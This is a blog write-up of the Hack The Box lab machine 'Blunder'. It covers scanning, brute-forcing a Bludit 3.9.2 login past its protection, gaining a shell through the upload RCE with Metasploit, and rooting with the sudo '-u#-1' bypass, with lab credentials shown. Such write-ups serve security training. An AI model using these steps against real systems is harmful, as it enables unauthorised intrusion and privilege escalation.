<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Hackthebox - Blunder" /><meta property="og:locale" content="en" /><meta name="description" content="Just another hackthebox writeups website powered by poorduck" /><meta property="og:description" content="Just another hackthebox writeups website powered by poorduck" /><link rel="canonical" href="https://x00tex.github.io/posts/blunder/" /><meta property="og:url" content="https://x00tex.github.io/posts/blunder/" /><meta property="og:site_name" content="Poorduck" /><meta property="og:image" content="https://x00tex.github.io/assets/img/posts/blunder/blunder_banner.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-09-08T18:30:00+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://x00tex.github.io/assets/img/posts/blunder/blunder_banner.png" /><meta property="twitter:title" content="Hackthebox - Blunder" /><meta name="twitter:site" content="@p00rduck" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-05-16T12:46:34+00:00","datePublished":"2020-09-08T18:30:00+00:00","description":"Just another hackthebox writeups website powered by poorduck","headline":"Hackthebox - Blunder","image":"https://x00tex.github.io/assets/img/posts/blunder/blunder_banner.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://x00tex.github.io/posts/blunder/"},"url":"https://x00tex.github.io/posts/blunder/"}</script><title>Hackthebox - Blunder | Poorduck</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Poorduck"><meta name="application-name" content="Poorduck"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/poorduck.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Poorduck</a></div><div class="site-subtitle font-italic">Kwak kwak</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/x00tex" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/p00rduck" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['x00tex-writeups.3us6n','simplelogin.co'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Hackthebox - Blunder</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hackthebox - Blunder</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/p00rduck">p00rduck</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1599589800" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2020-09-08 </em> </span> <span> Updated <em class="timeago" data-ts="1652705194" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-05-16 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="552 words"> <em>3 min</em> read</span></div></div></div><div class="post-content"><p><img data-src="/assets/img/posts/blunder/blunder_banner.png" alt="" data-proofer-ignore></p><p align="right"> <a href="https://www.hackthebox.eu/home/users/profile/391067" target="_blank"><img loading="lazy" alt="x00tex" data-src="https://www.hackthebox.eu/badge/image/391067" data-proofer-ignore></a></p><h1 id="scanning">Scanning</h1><h2 id="nmap"><span class="mr-2">Nmap</span><a href="#nmap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><code class="language-plaintext highlighter-rouge">ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.191 | grep open | awk -F / '{print $1}' ORS=',') echo $ports &amp;&amp; nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10.10.10.191</code></p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Blunder | A blunder of interesting facts
</pre></table></code></div></div><h2 id="gobuster"><span class="mr-2">Gobuster</span><a href="#gobuster" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><code class="language-plaintext highlighter-rouge">gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,php -t 50</code></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>/admin (Status: 301)
/todo.txt (Status: 200)
</pre></table></code></div></div><h3 id="admin"><span class="mr-2">/admin</span><a href="#admin" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><ul><li>in the admin page I found <a href="https://github.com/bludit/bludit">bludit CMS</a> admin login panel,<li>Looking at the source code, the CMS version is identified as <code class="language-plaintext highlighter-rouge">3.9.2</code></ul><h3 id="todotxt"><span class="mr-2">/todo.txt</span><a href="#todotxt" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><code class="language-plaintext highlighter-rouge">-Inform fergus that the new blog needs images - PENDING</code></p><p>potential username <strong>fergus</strong></p><h2 id="google"><span class="mr-2">Google</span><a href="#google" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><strong>search :</strong> <code class="language-plaintext highlighter-rouge">bludit 3.9.2 vulnerability</code></p><p><strong>2 CVEs Found</strong></p><p><strong>CVE-2019-17240</strong>:<em>bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.</em></p><p><strong>CVE-2019-16113 (1 Metasploit modules)</strong>:<em>Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.</em></p><h1 id="user-exploiting">User Exploiting</h1><h2 id="cve-2019-17240"><span class="mr-2">CVE-2019-17240</span><a href="#cve-2019-17240" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><strong>Discovered By</strong>: Rastating <strong>References</strong>: <a href="https://rastating.github.io/bludit-brute-force-mitigation-bypass/">rastating.github.io</a> Blog post.</p><ul><li><p>requirements</p><ul><li><strong>username:</strong> fergus<li><p><strong>wordlist:</strong> <em>create a wordlist from the website text</em></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cewl http://10.10.10.191 -w wordlist
</pre></table></code></div></div></ul></ul><h3 id="poc-script"><span class="mr-2">POC Script</span><a href="#poc-script" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><a href="https://github.com/x00tex/hackTheBox/blob/main/Boxes/linux/Retired/blunder/exploit/bludit_3.9.2-Bruteforce.py">bludit_3.9.2-Bruteforce.py</a></p><ul><li>Wordlist generated from webpage usubg cewl tool</ul><p><em>ippsec <a href="https://www.youtube.com/watch?v=G5iw8c2vXuk&amp;t=940s">video</a></em></p><h4 id="creds"><span class="mr-2">creds</span><a href="#creds" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>  fergus:RolandDeschain
</pre></table></code></div></div><h2 id="cve-2019-16113"><span class="mr-2">CVE-2019-16113</span><a href="#cve-2019-16113" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><strong>Discoverer</strong>: Christasa <strong>References</strong>: <a href="https://github.com/bludit/bludit/issues/1081">issue 1081</a></p><ul><li><p>requirements</p><ul><li><strong>username:</strong> fergus<li><strong>password:</strong> RolandDeschain</ul></ul><h3 id="exploiting"><span class="mr-2">Exploiting</span><a href="#exploiting" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><h4 id="using-exploitdb-script"><span class="mr-2">using ExploitDB Script</span><a href="#using-exploitdb-script" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><ul><li>Title: Bludit 3.9.2 - Directory Traversal<li>Author: James Green<li>EDB-ID: <a href="https://www.exploit-db.com/exploits/48701">48701</a></ul><p><a href="https://github.com/x00tex/hackTheBox/blob/main/Boxes/linux/Retired/blunder/exploit/Bludit_3.9.2-DirectoryTraversal.py">Bludit_3.9.2-DirectoryTraversal.py</a></p><p><em>ippsec <a href="https://www.youtube.com/watch?v=G5iw8c2vXuk&amp;t=2460s">video</a></em></p><h4 id="msf-module-rapid7"><span class="mr-2">MSF Module <a href="https://www.rapid7.com/db/modules/exploit/linux/http/bludit_upload_images_exec"><span class="mr-2">Rapid7</a></span><a href="#msf-module-rapid7" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><blockquote><p>exploit/linux/http/bludit_upload_images_exec</p></blockquote><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>BLUDITPASS =&gt; RolandDeschain
BLUDITUSER =&gt; fergus
RHOSTS =&gt; 10.10.10.191
LHOST =&gt; tun0
</pre></table></code></div></div><h3 id="low-lavel-user-shell-or-meterpreter-shell"><span class="mr-2">low lavel user shell or meterpreter shell</span><a href="#low-lavel-user-shell-or-meterpreter-shell" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre></table></code></div></div><h3 id="spawn-dumb-shell-ropnopcom-blog"><span class="mr-2">spawn dumb shell, <a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys"><span class="mr-2">ropnop.com blog</a></span><a href="#spawn-dumb-shell-ropnopcom-blog" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>$ which python
	/usr/bin/python
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg 	//Enter twice

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows &lt;num&gt; columns &lt;cols&gt;
</pre></table></code></div></div><p><strong>for meterpreter shell upgrade :</strong> <a href="https://www.hackingarticles.in/command-shell-to-meterpreter/">hackingarticles.in blog</a></p><h3 id="local-enumeration"><span class="mr-2">Local Enumeration</span><a href="#local-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><ul><li><p>Home directory has 2 users</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>hugo	//has user flag
shaun
</pre></table></code></div></div><li><p>in <code class="language-plaintext highlighter-rouge">/var/www/bludit-3.10.0a/bl-content/databases</code> directory</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>user.php	//contains Hugo's password hash

  "nickname": "Hugo",
  "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"
  //hash type SHA1
</pre></table></code></div></div><li><p>creds</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>hugo:Password120
</pre></table></code></div></div></ul><h1 id="root-prevesc">Root Prevesc</h1><ul><li><p><strong>Enumeration</strong></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>$ su - hugo
su - hugo
Password: Password120

hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$ sudo -V
sudo -V
Sudo version 1.8.25p1
</pre></table></code></div></div></ul><h3 id="google-1"><span class="mr-2">Google</span><a href="#google-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><strong>search :</strong> <code class="language-plaintext highlighter-rouge">sudo ALL, !root privesc</code></p><p><strong>1 CVE Found</strong></p><h4 id="cve-2019-14287"><span class="mr-2">CVE-2019-14287</span><a href="#cve-2019-14287" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre># Exploit Title : sudo 1.8.27 - Security Bypass
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo &lt;1.2.28
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
</pre></table></code></div></div><p>EDB-ID: <a href="https://www.exploit-db.com/exploits/47502">47502</a></p><ul><li><p>misconfigured sudo</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>$ sudo -l 
User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
</pre></table></code></div></div></ul><p><strong>EXPLOIT :</strong></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>$ sudo -u#-1 /bin/bash
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a>, <a href='/categories/linux/'>linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/bludit-3-9-2/" class="post-tag no-text-decoration" >bludit 3.9.2</a> <a href="/tags/cve-2019-17240/" class="post-tag no-text-decoration" >cve-2019-17240</a> <a href="/tags/cve-2019-16113/" class="post-tag no-text-decoration" >cve-2019-16113</a> <a href="/tags/sudo/" class="post-tag no-text-decoration" >sudo</a> <a href="/tags/cve-2019-14287/" class="post-tag no-text-decoration" >cve-2019-14287</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hackthebox - Blunder - Poorduck&amp;url=https://x00tex.github.io/posts/blunder/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hackthebox - Blunder - Poorduck&amp;u=https://x00tex.github.io/posts/blunder/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://x00tex.github.io/posts/blunder/&amp;text=Hackthebox - Blunder - Poorduck" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/meta/">Hackthebox - Meta</a><li><a href="/posts/pandora/">Hackthebox - Pandora</a><li><a href="/posts/writer/">Hackthebox - Writer</a><li><a href="/posts/blunder/">Hackthebox - Blunder</a><li><a href="/posts/luanne/">Hackthebox - Luanne</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/unicode/"><div class="card-body"> <em class="timeago small" data-ts="1638383400" > 2021-12-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Unicode</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.126 hackmedia.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux...</p></div></div></a></div><div class="card"> <a href="/posts/pikaboo/"><div class="card-body"> <em class="timeago small" data-ts="1639161000" > 2021-12-10 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Pikaboo</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.10.249 pikaboo.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 1...</p></div></div></a></div><div class="card"> <a href="/posts/writer/"><div class="card-body"> <em class="timeago small" data-ts="1639420200" > 2021-12-13 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Writer</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.101 writer.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <span class="btn btn-outline-primary disabled" prompt="Older"><p>-</p></span> <a href="/posts/tabby/" class="btn btn-outline-primary" prompt="Newer"><p>Hackthebox - Tabby</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/p00rduck">p00rduck</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 